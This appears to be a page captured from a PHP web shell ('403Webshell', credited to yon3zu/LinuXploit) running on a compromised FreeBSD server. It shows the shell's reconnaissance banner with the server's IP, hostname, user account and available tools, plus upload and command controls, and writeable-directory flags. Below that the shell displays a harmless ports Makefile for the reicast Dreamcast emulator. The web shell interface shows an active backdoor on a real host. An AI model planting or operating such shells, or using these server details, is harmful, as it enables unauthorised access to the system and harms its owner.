403Webshell
Server IP : 82.208.35.60  /  Your IP : 216.73.216.89
Web Server : Apache/2.4.55 (FreeBSD) OpenSSL/1.1.1q-freebsd PHP/7.3.31
System : FreeBSD server7.d2m.cz 12.4-RELEASE-p9 FreeBSD 12.4-RELEASE-p9 GENERIC amd64
User : studiokobylisy_cz ( 1008)
PHP Version : 7.3.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /usr/ports/emulators/reicast/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/ports/emulators/reicast/Makefile
PORTNAME=	reicast
PORTVERSION=	0.20201231
PORTREVISION=	1
CATEGORIES=	emulators games

MAINTAINER=	beyert@cs.ucr.edu
COMMENT=	Multi-platform Sega Dreamcast emulator
WWW=		https://github.com/reicast/reicast-emulator

LICENSE=	BSD3CLAUSE GPLv2 LGPL21
LICENSE_COMB=	multi
LICENSE_FILE=	${WRKSRC}/LICENSE

LIB_DEPENDS=	libao.so:audio/libao \
		libasound.so:audio/alsa-lib \
		libcurl.so:ftp/curl \
		libevdev.so:devel/libevdev \
		libpulse.so:audio/pulseaudio \
		libudev.so:devel/libudev-devd

USES=	cmake compiler gl xorg

.include <bsd.port.options.mk>

USE_GCC=	yes
USE_LDCONFIG=	yes
CMAKE_ARGS=	-DOPENGL_EGL_INCLUDE_DIR:PATH=${LOCALBASE}/include/EGL \
		-DOPENGL_GLX_INCLUDE_DIR:PATH=${LOCALBASE}/include/GL \
		-DOPENGL_INCLUDE_DIR:PATH=${LOCALBASE}/include/GL \
		-DOPENGL_opengl_LIBRARY:PATH=${LOCALBASE}/lib/libGL.so

.if ${ARCH} == i386
USE_BINUTILS=	yes
CXXFLAGS+=	-DSIMPLELINK
.endif

USE_GITHUB=	yes
GH_TUPLE=	reicast:reicast-emulator:0bd6ea3 \
		yuikns:intrin:ae63327:intrin/libswirl/deps/intrin

USE_XORG=	ice sm x11 xext
USE_GL=	egl gbm gl

PLIST_FILES=	bin/reicast

do-install:
	${INSTALL} ${WRKDIR}/.build/${PORTNAME} \
		${STAGEDIR}/${PREFIX}/bin/${PORTNAME};
	@${STRIP_CMD} ${STAGEDIR}${PREFIX}/bin/${PORTNAME}

.include <bsd.port.mk>

Youez - 2016 - github.com/yon3zu
LinuXploit